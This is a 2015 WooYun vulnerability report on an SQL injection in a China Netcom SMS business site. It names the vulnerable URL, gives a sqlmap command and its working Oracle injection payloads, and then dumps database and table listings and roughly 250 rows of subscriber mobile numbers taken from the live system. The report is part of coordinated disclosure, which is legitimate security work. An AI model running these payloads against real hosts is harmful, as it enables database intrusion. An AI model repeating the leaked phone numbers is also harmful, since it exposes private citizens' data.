中国网通某业务高危SQL注入（可跨库）可泄露市民信息（包括电话号码等）

漏洞概要关注数(24) 关注此漏洞

缺陷编号：wooyun-2015-097403

漏洞标题：中国网通某业务高危SQL注入（可跨库）可泄露市民信息（包括电话号码等）

漏洞作者：路人甲

提交时间：2015-02-15 17:04

修复时间：2015-04-01 17:06

公开时间：2015-04-01 17:06

漏洞类型：SQL注射漏洞

危害等级：高

自评Rank：15

漏洞状态：已交由第三方合作机构(cncert国家互联网应急中心)处理

漏洞来源： http://www.wooyun.org，如有疑问或需要帮助请联系 [email protected]

Tags标签：无

4人收藏收藏
分享漏洞：

漏洞详情

披露状态：

2015-02-15：细节已通知厂商并且等待厂商处理中
2015-02-19：厂商已经确认，细节仅向厂商公开
2015-03-01：细节向核心白帽子及相关领域专家公开
2015-03-11：细节向普通白帽子公开
2015-03-21：细节向实习白帽子公开
2015-04-01：细节向公众公开

简要描述：

中国网通某业务高危SQL注入（可跨库）可泄露市民信息（包括电话号码等）

详细说明：

附上原帖：http://wooyun.org/bugs/wooyun-2010-079089
发现有些地方未做处理，进一步挖掘，发现大量数据，可泄露市民信息，包括电话号码等
附上注入点：http://61.156.3.61/xiangqing.jsp?sm_no=135215

sqlmap -u http://61.156.3.61/xiangqing.jsp?sm_no=127744 -D MSGLLF --tables
    sqlmap/1.0-dev - automatic SQL injection and database takeover tool
    http://sqlmap.org
[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program
[*] starting at 14:34:50
[14:34:50] [INFO] resuming back-end DBMS 'oracle' 
[14:34:50] [INFO] testing connection to the target URL
sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
---
Place: GET
Parameter: sm_no
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: sm_no=127744' AND 4132=4132 AND 'RApj'='RApj
    Type: error-based
    Title: Oracle AND error-based - WHERE or HAVING clause (XMLType)
    Payload: sm_no=127744' AND 6298=(SELECT UPPER(XMLType(CHR(60)||CHR(58)||CHR(113)||CHR(107)||CHR(107)||CHR(106)||CHR(113)||(SELECT (CASE WHEN (6298=6298) THEN 1 ELSE 0 END) FROM DUAL)||CHR(113)||CHR(102)||CHR(108)||CHR(108)||CHR(113)||CHR(62))) FROM DUAL) AND 'PkAe'='PkAe
    Type: UNION query
    Title: Generic UNION query (NULL) - 15 columns
    Payload: sm_no=127744' UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,CHR(113)||CHR(107)||CHR(107)||CHR(106)||CHR(113)||CHR(108)||CHR(86)||CHR(103)||CHR(104)||CHR(73)||CHR(71)||CHR(83)||CHR(77)||CHR(109)||CHR(115)||CHR(113)||CHR(102)||CHR(108)||CHR(108)||CHR(113) FROM DUAL-- 
    Type: AND/OR time-based blind
    Title: Oracle AND time-based blind
    Payload: sm_no=127744' AND 5388=DBMS_PIPE.RECEIVE_MESSAGE(CHR(109)||CHR(84)||CHR(66)||CHR(119),5) AND 'kSSX'='kSSX
---
[14:34:50] [INFO] the back-end DBMS is Oracle
web application technology: JSP
back-end DBMS: Oracle

available databases [26]:
[*] CTXSYS
[*] HR
[*] MDSYS
[*] MSGLLF
[*] ODM
[*] ODM_MTR
[*] OE
[*] OLAPSYS
[*] ORDSYS
[*] OUTLN
[*] PM
[*] QS
[*] QS_CBADM
[*] QS_CS
[*] QS_ES
[*] QS_OS
[*] QS_WS
[*] RMAN
[*] SCOTT
[*] SH
[*] SYS
[*] SYSTEM
[*] UNICOMLLF
[*] WKSYS
[*] WMSYS
[*] XDB

涉及几百万用户数据包括电话号码等

Database: MSGLLF
Table: DB_00_SENDGROUP
[83082 entries]
+----------------+-----------+--------------+
| TIME_IN        | PUSH_FLAG | USER_MOBILE  |
+----------------+-----------+--------------+
[15:06:22] [WARNING] console output will be trimmed to last 256 rows due to large table size
| 20080606091210 | 1         | 05357191695  |
| 20080606091210 | 1         | 05357191705  |
| 20080606091210 | 1         | 05357191818  |
| 20080606091210 | 1         | 05354168598  |
| 20080606091210 | 1         | 05354168626  |
| 20080606091210 | 1         | 05357191927  |
| 20080606091210 | 1         | 05354176306  |
| 20080606091210 | 1         | 05357201685  |
| 20080606091210 | 1         | 05357201691  |
| 20080606091210 | 1         | 05354176319  |
| 20080606091210 | 1         | 05357201695  |
| 20080606091210 | 1         | 05354176365  |
| 20080606091210 | 1         | 05357201721  |
| 20080606091210 | 1         | 05357201786  |
| 20080606091210 | 1         | 05357250500  |
| 20080606091210 | 1         | 05357250502  |
| 20080606091210 | 1         | 05357250555  |
| 20080606091210 | 1         | 05357250567  |
| 20080606091210 | 1         | 05357250568  |
| 20080606091210 | 1         | 05357250588  |
| 20080606091210 | 1         | 05357250608  |
| 20080606091210 | 1         | 05357250616  |
| 20080606091210 | 1         | 05357250639  |
| 20080606091210 | 1         | 05357250680  |
| 20080606091210 | 1         | 05357250765  |
| 20080606091210 | 1         | 05357250776  |
| 20080606091210 | 1         | 05357250828  |
| 20080606091210 | 1         | 05353171961  |
| 20080606091210 | 1         | 05353171977  |
| 20080606091210 | 1         | 05357111799  |
| 20080606091210 | 1         | 05353172006  |
| 20080606091210 | 1         | 05357112025  |
| 20080606091210 | 1         | 05357112179  |
| 20080606091210 | 1         | 05353172571  |
| 20080606091210 | 1         | 05357112193  |
| 20080606091210 | 1         | 05353172612  |
| 20080606091210 | 1         | 05357112203  |
| 20080606091210 | 1         | 05357112216  |
| 20080606091210 | 1         | 05357112221  |
| 20080606091210 | 1         | 05357112245  |
| 20080606091210 | 1         | 05357112246  |
| 20080606091210 | 1         | 05353187275  |
| 20080606091210 | 1         | 05353187301  |
| 20080606091210 | 1         | 05353187327  |
| 20080606091210 | 1         | 05357120197  |
| 20080606091210 | 1         | 05357120220  |
| 20080606091210 | 1         | 05357120232  |
| 20080606091210 | 1         | 05357120260  |
| 20080606091210 | 1         | 05357120339  |
| 20080606091210 | 1         | 05352795506  |
| 20080606091210 | 1         | 05352795564  |
| 20080606091210 | 1         | 05352795587  |
| 20080606091210 | 1         | 05352795590  |
| 20080606091210 | 1         | 05352776868  |
| 20080606091210 | 1         | 05352776888  |
| 20080606091210 | 1         | 05352776915  |
| 20080606091210 | 1         | 05352777028  |
| 20080606091210 | 1         | 05352777119  |
| 20080606091210 | 1         | 05352777171  |
| 20080606091210 | 1         | 05352777187  |
| 20080606091210 | 1         | 05356543076  |
| 20080606091210 | 1         | 05356543089  |
| 20080606091210 | 1         | 05356543277  |
| 20080606091210 | 1         | 05356543306  |
| 20080606091210 | 1         | 05356543319  |
| 20080606091210 | 1         | 05356543562  |
| 20080606091210 | 1         | 05356543689  |
| 20080606091210 | 1         | 05356543833  |
| 20080606091210 | 1         | 05356543836  |
| 20080606091210 | 1         | 05356544066  |
| 20080606091210 | 1         | 05356544106  |
| 20080606091210 | 1         | 05356544082  |
| 20080606091210 | 1         | 05356544119  |
| 20080606091210 | 1         | 05356544684  |
| 20080606091210 | 1         | 05356544693  |
| 20080606091210 | 1         | 05356544727  |
| 20080606091210 | 1         | 05356544902  |
| 20080606091210 | 1         | 05356559620  |
| 20080606091210 | 1         | 05356559668  |
| 20080606091210 | 1         | 05356559782  |
| 20080606091210 | 1         | 05356559809  |
| 20080606091210 | 1         | 05356559905  |
| 20080606091210 | 1         | 05356559909  |
| 20080606091210 | 1         | 05356559937  |
| 20080606091210 | 1         | 05356559984  |
| 20080606091210 | 1         | 05356560128  |
| 20080606091210 | 1         | 05356560166  |
| 20080606091210 | 1         | 05356560188  |
| 20080606091210 | 1         | 05356560226  |
| 20080606091210 | 1         | 05356560295  |
| 20080606091210 | 1         | 05356560309  |
| 20080606091210 | 1         | 05356560356  |
| 20080606091210 | 1         | 05356560365  |
| 20080606091210 | 1         | 05356560406  |
| 20080606091210 | 1         | 05356560411  |
| 20080606091210 | 1         | 05356560448  |
| 20080606091210 | 1         | 05356569885  |
| 20080606091210 | 1         | 05356569892  |
| 20080606091210 | 1         | 05356569921  |
| 20080606091210 | 1         | 05356569935  |
| 20080606091210 | 1         | 05356569969  |
| 20080606091210 | 1         | 05356570050  |
| 20080606091210 | 1         | 05356570137  |
| 20080606091210 | 1         | 05356570188  |
| 20080606091210 | 1         | 05356570227  |
| 20080606091210 | 1         | 05356570264  |
| 20080606091210 | 1         | 05338150856  |
| 20080606091210 | 1         | 05356570298  |
| 20080606091210 | 1         | 05356570327  |
| 20080606091210 | 1         | 05356570410  |
| 20080606091210 | 1         | 05357012518  |
| 20080606091210 | 1         | 05357012550  |
| 20080606091210 | 1         | 05357012577  |
| 20080606091210 | 1         | 05357012657  |
| 20080606091210 | 1         | 05357012666  |
| 20080606091210 | 1         | 05357012668  |
| 20080606091210 | 1         | 05357012900  |
| 20080606091210 | 1         | 05357012901  |
| 20080606091210 | 1         | 05357012973  |
| 20080606091210 | 1         | 05357013054  |
| 20080606091210 | 1         | 05357013144  |
| 20080606091210 | 1         | 05357013159  |
| 20080606091210 | 1         | 05357013163  |
| 20080606091210 | 1         | 05357023108  |
| 20080606091210 | 1         | 05354174776  |
| 20080606091210 | 1         | 05357199815  |
| 20080606091210 | 1         | 05357199854  |
| 20080606091210 | 1         | 05354174956  |
| 20080606091210 | 1         | 05354175056  |
| 20080606091210 | 1         | 05357199957  |
| 20080606091210 | 1         | 05357199963  |
| 20080606091210 | 1         | 05357199983  |
| 20080606091210 | 1         | 05357200005  |
| 20080606091210 | 1         | 05354175135  |
| 20080606091210 | 1         | 05354175197  |
| 20080606091210 | 1         | 05354175207  |
| 20080606091210 | 1         | 05354175234  |
| 20080606091210 | 1         | 05357200267  |
| 20080606091210 | 1         | 05354175522  |
| 20080606091210 | 1         | 05357200687  |
| 20080606091210 | 1         | 05357200692  |
| 20080606091210 | 1         | 05357200697  |
| 20080606091210 | 1         | 05357200787  |
| 20080606091210 | 1         | 05357200821  |
| 20080606091210 | 1         | 05354175705  |
| 20080606091210 | 1         | 05354175719  |
| 20080606091210 | 1         | 05357201017  |
| 20080606091210 | 1         | 05357201083  |
| 20080606091210 | 1         | 05357201100  |
| 20080606091210 | 1         | 05357201171  |
| 20080606091210 | 1         | 05354175892  |
| 20080606091210 | 1         | 05354175895  |
| 20080606091210 | 1         | 05357201234  |
| 20080606091210 | 1         | 05354176044  |
| 20080606091210 | 1         | 05354176048  |
| 20080606091210 | 1         | 05354176073  |
| 20080606091210 | 1         | 05354176076  |
| 20080606091210 | 1         | 05354176157  |
| 20080606091210 | 1         | 05354176166  |
| 20080606091210 | 1         | 05357201627  |
| 20080606091210 | 1         | 05467616178  |
| 20080606091210 | 1         | 05467615281  |
| 20080606091210 | 1         | 05302693289  |
| 20080606091210 | 1         | 05467606568  |
| 20080606091210 | 1         | 05433596916  |
| 20080606091210 | 1         | 05432857101  |
| 20080606091210 | 1         | 05467855818  |
| 20080606091210 | 1         | 05467800897  |
| 20080606091210 | 1         | 05354177633  |
| 20080606091210 | 1         | 05354177716  |
| 20080606091210 | 1         | 05354177717  |
| 20080606091210 | 1         | 05357202802  |
| 20080606091210 | 1         | 05354177776  |
| 20080606091210 | 1         | 05357100225  |
| 20080606091210 | 1         | 05353159066  |
| 20080606091210 | 1         | 05353159126  |
| 20080606091210 | 1         | 05353159194  |
| 20080606091210 | 1         | 05353159202  |
| 20080606091210 | 1         | 05357100720  |
| 20080606091210 | 1         | 05353159755  |
| 20080606091210 | 1         | 05353159769  |
| 20080606091210 | 1         | 05353159869  |
| 20080606091210 | 1         | 05357100395  |
| 20080606091210 | 1         | 05357101947  |
| 20080606091210 | 1         | 05357101957  |
| 20080606091210 | 1         | 05357104291  |
| 20080606091210 | 1         | 05357105815  |
| 20080606091210 | 1         | 05357106440  |
| 20080606091210 | 1         | 05357115032  |
| 20080606091210 | 1         | 05353177029  |
| 20080606091210 | 1         | 05353177059  |
| 20080606091210 | 1         | 05353177090  |
| 20080606091210 | 1         | 05353177106  |
| 20080606091210 | 1         | 05353177133  |
| 20080606091210 | 1         | 05353177153  |
| 20080606091210 | 1         | 05353177157  |
| 20080606091210 | 1         | 05357115191  |
| 20080606091210 | 1         | 05353177356  |
| 20080606091210 | 1         | 05353189398  |
| 20080606091210 | 1         | 05357122048  |
| 20080606091210 | 1         | 05357122088  |
| 20080606091210 | 1         | 05357122138  |
| 20080606091210 | 1         | 05372920753  |
| 20080606091210 | 1         | 05353189622  |
| 20080606091210 | 1         | 05372921656  |
| 20080606091210 | 1         | 05353189667  |
| 20080606091210 | 1         | 05353189677  |
| 20080606091210 | 1         | 05353189785  |
| 20080606091210 | 1         | 05353189790  |
| 20080606091210 | 1         | 05353189815  |
| 20080606091210 | 1         | 05357122353  |
| 20080606091210 | 1         | 05357122377  |
| 20080606091210 | 1         | 05357122508  |
| 20080606091210 | 1         | 05357178359  |
| 20080606091210 | 1         | 05357191917  |
| 20080606091210 | 1         | 05357193327  |
| 20080606091210 | 1         | 05354169897  |
| 20080606091210 | 1         | 05354169901  |
| 20080606091210 | 1         | 05354169910  |
| 20080606091210 | 1         | 05354169916  |
| 20080606091210 | 1         | 05354169926  |
| 20080606091210 | 1         | 05354169956  |
| 20080606091210 | 1         | 05357195231  |
| 20080606091210 | 1         | 05357195242  |

Database: WKSYS
[38 tables]
+--------------------------------+
| SYS_IOT_OVER_27796             |
| SYS_IOT_OVER_27912             |
| WK$CHARSET                     |
| WK$CRAWLER_CONFIG_DEFAULT      |
| WK$INSTANCE                    |
| WK$INST_ADMIN                  |
| WK$LANG                        |
| WK$MIMETYPES                   |
| WK$SNP_DEP                     |
| WK$SNP_TAB                     |
| WK$SUBSCRIBER                  |
| WK$SYS_CONFIG                  |
| WK$SYS_PRIV                    |
| WK$_ATTR_MAPPING               |
| WK$_ATTR_USAGE                 |
| WK$_AUTHBASIC                  |
| WK$_CRAWLER_CONFIG             |
| WK$_CRAWLER_SCHED              |
| WK$_CRAWLER_STAT               |
| WK$_DATA_SOURCE                |
| WK$_DATA_SOURCE_PARAM          |
| WK$_DATA_SOURCE_PARAM_VAL      |
| WK$_DATA_SOURCE_TYPE           |
| WK$_DOC_ATTR                   |
| WK$_GROUP_DS_MAPPING           |
| WK$_JOB_INFO                   |
| WK$_MAILLIST                   |
| WK$_PORTAL                     |
| WK$_PORTAL_DS_MAP              |
| WK$_SCHED_MAPPING              |
| WK$_SEARCH_ATTR                |
| WK$_SEARCH_ATTR_TL             |
| WK$_SOURCE_GROUP               |
| WK$_SOURCE_GROUP_TL            |
| WK$_SYSINFO                    |
| WK$_SYS_ADMIN                  |
| WK$_TDS_LOG                    |
| WK$_TRACE                      |
+--------------------------------+
Database: QS_OS
[14 tables]
+--------------------------------+
| AQ$_QS_OS_ORDERS_MQTAB_H       |
| AQ$_QS_OS_ORDERS_MQTAB_I       |
| AQ$_QS_OS_ORDERS_MQTAB_NR      |
| AQ$_QS_OS_ORDERS_MQTAB_S       |
| AQ$_QS_OS_ORDERS_MQTAB_T       |
| AQ$_QS_OS_ORDERS_PR_MQTAB_H    |
| AQ$_QS_OS_ORDERS_PR_MQTAB_I    |
| AQ$_QS_OS_ORDERS_PR_MQTAB_NR   |
| AQ$_QS_OS_ORDERS_PR_MQTAB_S    |
| AQ$_QS_OS_ORDERS_PR_MQTAB_T    |
| QS_OS_ORDERS_MQTAB             |
| QS_OS_ORDERS_PR_MQTAB          |
| SYS_IOT_OVER_30015             |
| SYS_IOT_OVER_30033             |
+--------------------------------+
Database: ORDSYS
[5 tables]
+--------------------------------+
| JACCELERATOR$DLLS              |
| JACCELERATOR$DLL_ERRORS        |
| JACCELERATOR$STATUS            |
| ORD_CARTRIDGE_COMPONENTS       |
| ORD_INSTALLATIONS              |
+--------------------------------+
Database: HR
[7 tables]
+--------------------------------+
| COUNTRIES                      |
| DEPARTMENTS                    |
| EMPLOYEES                      |
| JOBS                           |
| JOB_HISTORY                    |
| LOCATIONS                      |
| REGIONS                        |
+--------------------------------+
Database: OLAPSYS
[58 tables]
+--------------------------------+
| CWM$ARGUMENT                   |
| CWM$CLASSIFICATION             |
| CWM$CLASSIFICATIONENTRY        |
| CWM$CLASSIFICATIONTYPE         |
| CWM$CUBE                       |
| CWM$CUBEDIMENSIONUSE           |
| CWM$DIMENSION                  |
| CWM$DIMENSIONATTRIBUTE         |
| CWM$DOMAIN                     |
| CWM$FACTLEVELGROUP             |
| CWM$FACTLEVELUSE               |
| CWM$FACTTABLEMAP               |
| CWM$FACTUSE                    |
| CWM$FUNCTION                   |
| CWM$FUNCTIONUSE                |
| CWM$HIERARCHY                  |
| CWM$ITEMMAP                    |
| CWM$ITEMUSE                    |
| CWM$LEVEL                      |
| CWM$LEVELATTRIBUTE             |
| CWM$MEASURE                    |
| CWM$MEASUREDIMENSIONUSE        |
| CWM$MODEL                      |
| CWM$OBJECTTYPE                 |
| CWM$PARAMETER                  |
| CWM$PROJECT                    |
| CWM2$AWLOGICALATTRUSE          |
| CWM2$AWLOGICALDIMUSE           |
| CWM2$AWLOGICALHIERUSE          |
| CWM2$AWLOGICALLEVELUSE         |
| CWM2$AWLOGICALMEASUSE          |
| CWM2$AWLOGICALOBJLIMITSETUSE   |
| CWM2$AWPHYSICALOBJ             |
| CWM2$AWPHYSICALOBJEXT          |
| CWM2$AWPHYSICALOBJPROPS        |
| CWM2$AWPHYSICALOBJRELATEDOBJS  |
| CWM2$AW_DIMENSIONMAP           |
| CWM2$AW_MEASUREMAP             |
| CWM2$CUBE                      |
| CWM2$CUBEDIMENSIONUSE          |
| CWM2$DIMENSION                 |
| CWM2$DIMENSIONATTRIBUTE        |
| CWM2$DIMHIERLVLMAP             |
| CWM2$FACTDIMHIERMAP            |
| CWM2$FACTDIMHIERTPLSDTL        |
| CWM2$FACTKEYDIMHIERLVLMAP      |
| CWM2$FACTKEYDIMHIERMAP         |
| CWM2$HIERARCHY                 |
| CWM2$HIERCUSTOMSORT            |
| CWM2$HIERLEVELREL              |
| CWM2$LEVEL                     |
| CWM2$LEVELATTRIBUTE            |
| CWM2$LEVELATTRIBUTEMAP         |
| CWM2$MEASURE                   |
| CWM2$MEASURETABLEMAP           |
| CWM2$OLAPMANAGERTABLE          |
| CWM2$STOREDDIMLVLTPLS          |
| CWM2$STOREDDIMLVLTPLSDTL       |
+--------------------------------+
Database: OUTLN
[3 tables]
+--------------------------------+
| OL$                            |
| OL$HINTS                       |
| OL$NODES                       |
+--------------------------------+
Database: XDB
[5 tables]
+--------------------------------+
| XDB$CHECKOUTS                  |
| XDB$COLUMN_INFO                |
| XDB$H_INDEX                    |
| XDB$PATH_INDEX_PARAMS          |
| XDB$ROOT_INFO                  |
+--------------------------------+
Database: QS_CS
[8 tables]
+--------------------------------+
| AQ$_QS_CS_ORDER_STATUS_QT_H    |
| AQ$_QS_CS_ORDER_STATUS_QT_I    |
| AQ$_QS_CS_ORDER_STATUS_QT_NR   |
| AQ$_QS_CS_ORDER_STATUS_QT_S    |
| AQ$_QS_CS_ORDER_STATUS_QT_T    |
| ORDER_STATUS_TABLE             |
| QS_CS_ORDER_STATUS_QT          |
| SYS_IOT_OVER_30090             |
+--------------------------------+
Database: MDSYS
[18 tables]
+--------------------------------+
| CS_SRS                         |
| MD$RELATE                      |
| OGIS_GEOMETRY_COLUMNS          |
| OGIS_SPATIAL_REFERENCE_SYSTEMS |
| SDO_ANGLE_UNITS                |
| SDO_AREA_UNITS                 |
| SDO_DATUMS                     |
| SDO_DIST_UNITS                 |
| SDO_ELLIPSOIDS                 |
| SDO_GEOM_METADATA_TABLE        |
| SDO_INDEX_METADATA_TABLE       |
| SDO_LRS_METADATA_TABLE         |
| SDO_MAPS_TABLE                 |
| SDO_PROJECTIONS                |
| SDO_STYLES_TABLE               |
| SDO_THEMES_TABLE               |
| USER_CS_SRS                    |
| USER_TRANSFORM_MAP             |
+--------------------------------+
Database: ODM
[25 tables]
+--------------------------------+
| CREATE$JAVA$LOB$TABLE          |
| DMS_QUEUE_TABLE                |
| JAVA$CLASS$MD5$TABLE           |
| ODM_APPLY_RESULT               |
| ODM_A_I_MODEL                  |
| ODM_CATEGORY_MATRIX_ENTRY      |
| ODM_CLASSIFICATION_TEST_RESULT |
| ODM_CONFIGURATION              |
| ODM_ERROR_TABLE                |
| ODM_INTERNAL_CONFIGURATION     |
| ODM_ITEM_PRIOR                 |
| ODM_I_I_ANTECEDENT             |
| ODM_I_I_RULE                   |
| ODM_LIFT_RESULT                |
| ODM_LIFT_RESULT_ENTRY          |
| ODM_MESSAGE_LOG                |
| ODM_MINING_FUNCTION_SETTINGS   |
| ODM_MINING_MODEL               |
| ODM_MINING_TASK                |
| ODM_MINING_TASK_STATE          |
| ODM_MODEL_SEEKER_RESULT        |
| ODM_MS_RESULT_ENTRY            |
| ODM_PMML_DTD                   |
| ODM_P_I_ITEM_RULES             |
| ODM_TEST_RESULT                |
+--------------------------------+
Database: QS_CBADM
[8 tables]
+--------------------------------+
| AQ$_QS_CBADM_ORDERS_MQTAB_H    |
| AQ$_QS_CBADM_ORDERS_MQTAB_I    |
| AQ$_QS_CBADM_ORDERS_MQTAB_NR   |
| AQ$_QS_CBADM_ORDERS_MQTAB_S    |
| AQ$_QS_CBADM_ORDERS_MQTAB_T    |
| QS_CBADM_ORDERS_MQTAB          |
| QS_CBADM_ORDERS_SQTAB          |
| SYS_IOT_OVER_30066             |
+--------------------------------+
Database: CTXSYS
[36 tables]
+--------------------------------+
| DR$CLASS                       |
| DR$DELETE                      |
| DR$INDEX                       |
| DR$INDEX_ERROR                 |
| DR$INDEX_OBJECT                |
| DR$INDEX_PARTITION             |
| DR$INDEX_SET                   |
| DR$INDEX_SET_INDEX             |
| DR$INDEX_VALUE                 |
| DR$OBJECT                      |
| DR$OBJECT_ATTRIBUTE            |
| DR$OBJECT_ATTRIBUTE_LOV        |
| DR$ONLINE_PENDING              |
| DR$PARALLEL                    |
| DR$PARAMETER                   |
| DR$PART_STATS                  |
| DR$PENDING                     |
| DR$POLICY_TAB                  |
| DR$PREFERENCE                  |
| DR$PREFERENCE_VALUE            |
| DR$SECTION                     |
| DR$SECTION_GROUP               |
| DR$SERVER                      |
| DR$SQE                         |
| DR$STATS                       |
| DR$STOPLIST                    |
| DR$STOPWORD                    |
| DR$SUB_LEXER                   |
| DR$THS                         |
| DR$THS_BT                      |
| DR$THS_FPHRASE                 |
| DR$THS_PHRASE                  |
| DR$UNINDEXED                   |
| DR$WAITING                     |
| SYS_IOT_OVER_26472             |
| SYS_IOT_OVER_26567             |
+--------------------------------+
Database: QS_ES
[14 tables]
+--------------------------------+
| AQ$_QS_ES_ORDERS_MQTAB_H       |
| AQ$_QS_ES_ORDERS_MQTAB_I       |
| AQ$_QS_ES_ORDERS_MQTAB_NR      |
| AQ$_QS_ES_ORDERS_MQTAB_S       |
| AQ$_QS_ES_ORDERS_MQTAB_T       |
| AQ$_QS_ES_ORDERS_PR_MQTAB_H    |
| AQ$_QS_ES_ORDERS_PR_MQTAB_I    |
| AQ$_QS_ES_ORDERS_PR_MQTAB_NR   |
| AQ$_QS_ES_ORDERS_PR_MQTAB_S    |
| AQ$_QS_ES_ORDERS_PR_MQTAB_T    |
| QS_ES_ORDERS_MQTAB             |
| QS_ES_ORDERS_PR_MQTAB          |
| SYS_IOT_OVER_29925             |
| SYS_IOT_OVER_29943             |
+--------------------------------+
Database: PM
[2 tables]
+--------------------------------+
| ONLINE_MEDIA                   |
| PRINT_MEDIA                    |
+--------------------------------+
Database: UNICOMLLF
[25 tables]
+--------------------------------+
| AA                             |
| DB_11_TYPE_GZ                  |
| DB_11_T_GZ                     |
| LINSHI                         |
| PLAN_TABLE                     |
| SMG_LOG                        |
| SP_ORIINFO                     |
| SP_ORIINFO_ERR                 |
| SP_SENDINFO                    |
| SP_SENDINFO_MID                |
| SYS_MO_TABLE                   |
| SYS_MT_TABLE                   |
| TF_BLACK_USER                  |
| TF_GROUPSENDORDER_HISTORY      |
| TF_GROUP_CANCELSEND            |
| TF_GROUP_ORDERSEND_TEMP        |
| TF_JOB_LIST                    |
| TF_MANAGER_RIGHT               |
| TF_MANAGE_LOG                  |
| TF_MSG_CONTENT                 |
| TF_MSG_CONTENT_BAK             |
| TF_ORDER_LOG                   |
| TF_SMS_CLASS                   |
| TF_SYS_CONF                    |
| TF_USER_INFO                   |
+--------------------------------+
Database: MSGLLF
[245 tables]
+--------------------------------+
| 奖励基金表                          |
| AB                             |
| CENTTXT                        |
| DB_00_SENDGROUP                |
| DB_00_SENDGROUP2               |
| HD                             |
| NTF_AREA_CODE                  |
| NTF_GROUP_SEND                 |
| NTF_GROUP_SEND_TEMP            |
| NTF_MANAGER_RIGHT              |
| NTF_MANAGE_LOG                 |
| NTF_MSG_CONTENT                |
| NTF_ORDER                      |
| NTF_ORDER_LOG                  |
| NTF_REPORT_AREA                |
| NTF_REPORT_DAY                 |
| NTF_SERVICETYPE                |
| NTF_SMS_CLASS                  |
| NTF_USER_INFO                  |
| NTF_WEB_SEND                   |
| PBCATCOL                       |
| PBCATEDT                       |
| PBCATFMT                       |
| PBCATTBL                       |
| PBCATVLD                       |
| PLAN_TABLE                     |
| SYS_MENU_INFO                  |
| SYS_MENU_INFO_OLD              |
| SYS_MODEL_INFO                 |
| SYS_MODEL_INFO_OLD             |
| SYS_ROLE_INFO                  |
| SYS_ROLE_MENU                  |
| SYS_ROLE_MENU_OLD              |
| TBR_FUND_DTL                   |
| TBR_USER_BALANCE               |
| TBR_USER_INCOME_DTL            |
| TBR_USER_PRIZE                 |
| TCM_GROUP_SEND_LIST            |
| TCM_USER_SMS_RELATE            |
| TDW_SMCLASS_USER_IV            |
| TDW_SMCLASS_USER_TEMP          |
| TDW_SMNO_NOSEND_IV             |
| TDW_SMNO_NOSEND_TEMP           |
| TDW_TIME_SEND                  |
| TDW_USER_CLASS_IV              |
| TDW_USER_CLASS_TEMP            |
| TEMP_GROUP_SEND                |
| TEMP_GROUP_SEND1               |
| TEMP_GUEST_TTJK                |
| TEMP_SENDGROUP_USER            |
| TEST_CHARGE                    |
| TEST_CUSTOMER_CONTENT          |
| TEST_GUEST                     |
| TF_8REMINDNO_LIST              |
| TF_8REMIND_LIST                |
| TF_AREACOUNT_INFO              |
| TF_AREA_CHARGE_REPORT          |
| TF_AREA_NAME                   |
| TF_AREA_REPORT_DETAIL          |
| TF_AREA_REPORT_MONTH           |
| TF_AREA_REPORT_WEEK            |
| TF_AY_CONTENT                  |
| TF_AY_TRANSMIT                 |
| TF_AY_USER                     |
| TF_BLACKUSER_INFO              |
| TF_BLACKUSER_INFO2             |
| TF_BLACKUSER_INFO_LOG          |
| TF_BLACK_VIRULENTUSER          |
| TF_CHARGE_LOG                  |
| TF_CHARGE_LOG_BAK              |
| TF_CHARGE_LOG_TTJK             |
| TF_CHINESECH                   |
| TF_CITY_NO                     |
| TF_CITY_REPORT_EVERYDAY        |
| TF_CNC_QDUSER                  |
| TF_CNC_USER                    |
| TF_CNC_USER1                   |
| TF_COMMEND_USER                |
| TF_CUSTOMER_CONTENT            |
| TF_FORBIDDEN_AREA              |
| TF_FORBIDDEN_MOBILE            |
| TF_FUND                        |
| TF_FUND1                       |
| TF_GM_USER                     |
| TF_GM_USER_HENAN_MANAGER       |
| TF_GM_USER_HENAN_PHONE         |
| TF_GM_USER_TEMP                |
| TF_GM_USER_TEMP1               |
| TF_GM_USER_TEMP2               |
| TF_GM_USER_TEMP3               |
| TF_GM_USER_TEMP4               |
| TF_GM_USER_TENP3               |
| TF_GROUPSEND_HISTORY           |
| TF_GROUPSEND_LOG               |
| TF_GROUPSEND_MOBILE            |
| TF_GROUP_CANCELSEND            |
| TF_GROUP_ORDERSEND             |
| TF_GROUP_SEND                  |
| TF_GROUP_SEND_BAK              |
| TF_GUEST                       |
| TF_GUEST_BAK                   |
| TF_GUEST_TEMP                  |
| TF_GUEST_TTJK                  |
| TF_HN_PHONEUSER                |
| TF_HOLIDAY_LIST                |
| TF_HOLIDAY_POP                 |
| TF_JOB_LIST                    |
| TF_JOB_LISTHIS                 |
| TF_LOGTB                       |
| TF_MANAGER_RIGHT               |
| TF_MANAGE_LOG                  |
| TF_MSG_CONTENT                 |
| TF_MSG_CONTENT_TTJK            |
| TF_MSG_REGION                  |
| TF_MSG_REGION1                 |
| TF_MSG_TAILOR_LIST             |
| TF_NAME                        |
| TF_ORDER                       |
| TF_ORDER_LOG                   |
| TF_PHONE_RANG                  |
| TF_PRIZE_REMIND                |
| TF_PRIZE_USER                  |
| TF_PRIZE_USER1                 |
| TF_REG_UNREG_USER              |
| TF_REMINDED_LIST               |
| TF_REPORT_AREA                 |
| TF_REPORT_AREAHIS              |
| TF_REPORT_AREATEMP             |
| TF_REPORT_DAY                  |
| TF_REPORT_DAYHIS               |
| TF_REPORT_DAYTEMP              |
| TF_REVERSQX_DETAIL             |
| TF_SEND_MOBILE                 |
| TF_SEND_USER                   |
| TF_SERVICETYPE                 |
| TF_SETFEE_REPORT               |
| TF_SHOUFEI_USER                |
| TF_SMS_CHECK_INFO              |
| TF_SMS_CLASS                   |
| TF_SM_DOWN01                   |
| TF_SM_DOWN02                   |
| TF_SM_DOWN03                   |
| TF_SM_DOWN04                   |
| TF_SM_DOWN05                   |
| TF_SM_DOWN06                   |
| TF_SM_DOWN07                   |
| TF_SM_DOWN08                   |
| TF_SM_DOWN09                   |
| TF_SM_DOWN10                   |
| TF_SM_DOWN11                   |
| TF_SM_DOWN12                   |
| TF_SM_UP                       |
| TF_SM_UP1                      |
| TF_SYS_CONF                    |
| TF_TELECOM_USERS               |
| TF_TEMPMSGCONTENT              |
| TF_TEMP_USER                   |
| TF_TEST_USER_INFO1             |
